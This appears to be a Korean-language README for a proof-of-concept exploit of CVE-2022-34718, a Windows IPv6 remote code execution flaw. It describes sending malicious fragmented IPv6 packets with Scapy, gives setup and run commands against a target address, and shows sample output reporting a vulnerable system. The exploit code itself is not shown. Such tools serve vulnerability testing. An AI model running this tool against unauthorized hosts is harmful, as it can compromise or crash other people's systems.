
CVE-2022-34718에 대한 개념 증명 익스플로잇으로, Windows IPv6 스택의 원격 코드 실행 취약점입니다. 악성 단편화된 IPv6 패킷을 전송하고 취약한 시스템을 탐지하는 데 Scapy를 사용합니다.
이 저장소는 Windows 시스템의 IPv6에서 원격 코드 실행(RCE) 취약점인 CVE-2022-34718에 대한 익스플로잇을 포함합니다.
취약점은 특수하게 조작된 IPv6 패킷을 필요로 하므로 Scapy 모듈에 의존하며, 따라서 루트 권한으로 실행해야 합니다. 이 PoC를 실행하는 권장 방법은 가상 환경을 사용하는 것입니다. 예를 들어:
# virtualenv PoC
# source PoC/bin/activate
(PoC) # pip3 install -r requirements.txt
(PoC) # python3 ipv6-rce-poc.py <target address>
스크립트는 대상 시스템이 이 익스플로잇에 취약한지 여부를 알려줍니다.
[...]
**** inner_frag_id: 0x24944eac
Preparing frags...
Sending 64 frags...
.
Sent 1 packets.
[...]
Sent 1 packets.
Now sending the last inner fragment to trigger the bug...
.
Sent 1 packets.
Success! The system is vulnerable...